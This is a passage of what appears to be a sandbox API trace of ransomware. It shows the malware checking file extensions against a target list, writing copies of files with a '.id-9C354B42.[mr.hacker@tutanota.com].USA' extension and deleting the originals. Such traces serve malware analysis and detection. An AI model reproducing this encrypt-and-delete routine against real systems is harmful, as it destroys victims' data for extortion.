Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0264.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0264.177] lstrlenW (lpString=".doc") returned 4 [0264.177] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0264.177] lstrlenW (lpString=".docx") returned 5 [0264.177] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0264.177] lstrlenW (lpString=".pdf") returned 4 [0264.177] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0264.177] lstrlenW (lpString=".xls") returned 4 [0264.177] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0264.177] lstrlenW (lpString=".xlsx") returned 5 [0264.177] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0264.177] lstrlenW (lpString=".ppt") returned 4 [0264.177] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0264.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0264.177] lstrlenW (lpString=".zip") returned 4 [0264.177] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0264.177] lstrlenW (lpString=".rar") returned 4 [0264.177] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0264.177] lstrlenW (lpString=".bz2") returned 4 [0264.177] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0264.177] lstrlenW (lpString=".7z") returned 3 [0264.177] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0264.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0264.178] lstrlenW (lpString=".dbf") returned 4 [0264.178] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0264.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0264.178] lstrlenW (lpString=".1cd") returned 4 [0264.178] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0264.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0264.178] lstrlenW (lpString=".jpg") returned 4 [0264.178] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0264.178] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0264.178] lstrlenW (lpString="boxed-join.avi") returned 14 [0264.178] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0264.178] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=33280) returned 1 [0264.178] CloseHandle (hObject=0x350) returned 1 [0264.178] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0264.178] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.178] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0264.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0264.178] lstrlenW (lpString=".doc") returned 4 [0264.178] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0264.179] lstrlenW (lpString=".docx") returned 5 [0264.179] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0264.179] lstrlenW (lpString=".pdf") returned 4 [0264.179] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0264.179] lstrlenW (lpString=".xls") returned 4 [0264.179] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0264.179] lstrlenW (lpString=".xlsx") returned 5 [0264.179] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0264.179] lstrlenW (lpString=".ppt") returned 4 [0264.179] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0264.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0264.179] lstrlenW (lpString=".zip") returned 4 [0264.179] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0264.179] lstrlenW (lpString=".rar") returned 4 [0264.179] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0264.179] lstrlenW (lpString=".bz2") returned 4 [0264.179] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0264.179] lstrlenW (lpString=".7z") returned 3 [0264.179] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0264.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0264.179] lstrlenW (lpString=".dbf") returned 4 [0264.179] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0264.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0264.179] lstrlenW (lpString=".1cd") returned 4 [0264.179] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0264.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0264.179] lstrlenW (lpString=".jpg") returned 4 [0264.179] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0264.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0264.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0264.179] lstrlenW (lpString=".doc") returned 4 [0264.179] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0264.180] lstrlenW (lpString=".docx") returned 5 [0264.180] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0264.180] lstrlenW (lpString=".pdf") returned 4 [0264.180] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0264.180] lstrlenW (lpString=".xls") returned 4 [0264.180] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0264.180] lstrlenW (lpString=".xlsx") returned 5 [0264.180] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0264.180] lstrlenW (lpString=".ppt") returned 4 [0264.180] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0264.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0264.180] lstrlenW (lpString=".zip") returned 4 [0264.180] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0264.180] lstrlenW (lpString=".rar") returned 4 [0264.180] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0264.180] lstrlenW (lpString=".bz2") returned 4 [0264.180] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0264.180] lstrlenW (lpString=".7z") returned 3 [0264.180] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0264.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0264.180] lstrlenW (lpString=".dbf") returned 4 [0264.180] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0264.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0264.180] lstrlenW (lpString=".1cd") returned 4 [0264.180] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0264.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0264.180] lstrlenW (lpString=".jpg") returned 4 [0264.180] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0264.180] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0264.181] lstrlenW (lpString="boxed-split.avi") returned 15 [0264.181] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0264.181] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=62976) returned 1 [0264.181] CloseHandle (hObject=0x350) returned 1 [0264.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0264.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.181] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.181] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0264.181] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0264.181] lstrlenW (lpString=".doc") returned 4 [0264.181] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0264.181] lstrlenW (lpString=".docx") returned 5 [0264.181] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0264.181] lstrlenW (lpString=".pdf") returned 4 [0264.181] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0264.181] lstrlenW (lpString=".xls") returned 4 [0264.181] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0264.181] lstrlenW (lpString=".xlsx") returned 5 [0264.181] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0264.181] lstrlenW (lpString=".ppt") returned 4 [0264.181] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0264.181] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0264.181] lstrlenW (lpString=".zip") returned 4 [0264.182] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0264.182] lstrlenW (lpString=".rar") returned 4 [0264.182] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0264.182] lstrlenW (lpString=".bz2") returned 4 [0264.182] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0264.182] lstrlenW (lpString=".7z") returned 3 [0264.182] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0264.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0264.182] lstrlenW (lpString=".dbf") returned 4 [0264.182] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0264.682] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.683] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.683] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.683] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.760] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=5088) returned 1 [0265.760] CloseHandle (hObject=0x2b0) returned 1 [0265.760] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png")) returned 0x20 [0265.783] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.783] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0267.600] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0267.600] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0267.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0267.622] GetLastError () returned 0x0 [0267.622] ReadFile (in: hFile=0x2a8, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x3a94, lpOverlapped=0x0) returned 1 [0267.626] WriteFile (in: hFile=0x384, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x3aa0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x3aa0, lpOverlapped=0x0) returned 1 [0267.627] ReadFile (in: hFile=0x2a8, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0267.627] WriteFile (in: hFile=0x384, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.627] SetEndOfFile (hFile=0x384) returned 1 [0267.627] CloseHandle (hObject=0x384) returned 1 [0267.627] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0267.627] SetEndOfFile (hFile=0x2a8) returned 1 [0267.629] CloseHandle (hObject=0x2a8) returned 1 [0267.629] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.811] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf")) returned 1 [0268.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0268.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0268.004] lstrlenW (lpString=".doc") returned 4 [0268.004] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.004] lstrlenW (lpString=".docx") returned 5 [0268.004] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.004] lstrlenW (lpString=".pdf") returned 4 [0268.004] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.004] lstrlenW (lpString=".xls") returned 4 [0268.004] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.004] lstrlenW (lpString=".xlsx") returned 5 [0268.004] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.005] lstrlenW (lpString=".ppt") returned 4 [0268.005] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0268.005] lstrlenW (lpString=".zip") returned 4 [0268.005] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.005] lstrlenW (lpString=".rar") returned 4 [0268.005] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.005] lstrlenW (lpString=".bz2") returned 4 [0268.005] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.005] lstrlenW (lpString=".7z") returned 3 [0268.005] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0268.005] lstrlenW (lpString=".dbf") returned 4 [0268.005] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0268.005] lstrlenW (lpString=".1cd") returned 4 [0268.005] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0268.005] lstrlenW (lpString=".jpg") returned 4 [0268.005] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0268.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0268.005] lstrlenW (lpString=".doc") returned 4 [0268.005] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.005] lstrlenW (lpString=".docx") returned 5 [0268.005] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.005] lstrlenW (lpString=".pdf") returned 4 [0268.006] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.006] lstrlenW (lpString=".xls") returned 4 [0268.006] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.006] lstrlenW (lpString=".xlsx") returned 5 [0268.006] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.006] lstrlenW (lpString=".ppt") returned 4 [0268.006] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0268.006] lstrlenW (lpString=".zip") returned 4 [0268.006] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.006] lstrlenW (lpString=".rar") returned 4 [0268.006] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.006] lstrlenW (lpString=".bz2") returned 4 [0268.006] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.006] lstrlenW (lpString=".7z") returned 3 [0268.006] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0268.006] lstrlenW (lpString=".dbf") returned 4 [0268.006] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0268.006] lstrlenW (lpString=".1cd") returned 4 [0268.006] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0268.006] lstrlenW (lpString=".jpg") returned 4 [0268.006] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.006] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.006] lstrlenW (lpString="CUPINST.WMF") returned 11 [0268.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0268.017] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=10326) returned 1 [0268.017] CloseHandle (hObject=0x380) returned 1 [0268.017] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf")) returned 0x20 [0268.187] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0268.405] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.405] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0268.406] GetLastError () returned 0x0 [0268.406] ReadFile (in: hFile=0x2b4, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x2856, lpOverlapped=0x0) returned 1 [0268.407] WriteFile (in: hFile=0x39c, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x2860, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x2860, lpOverlapped=0x0) returned 1 [0268.408] ReadFile (in: hFile=0x2b4, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.408] WriteFile (in: hFile=0x39c, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xea, lpOverlapped=0x0) returned 1 [0268.408] SetEndOfFile (hFile=0x39c) returned 1 [0268.408] CloseHandle (hObject=0x39c) returned 1 [0268.408] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.408] SetEndOfFile (hFile=0x2b4) returned 1 [0268.411] CloseHandle (hObject=0x2b4) returned 1 [0268.411] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.412] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf")) returned 1 [0268.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0268.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0268.412] lstrlenW (lpString=".doc") returned 4 [0268.412] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.412] lstrlenW (lpString=".docx") returned 5 [0268.412] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0268.412] lstrlenW (lpString=".pdf") returned 4 [0268.412] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.412] lstrlenW (lpString=".xls") returned 4 [0268.412] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.412] lstrlenW (lpString=".xlsx") returned 5 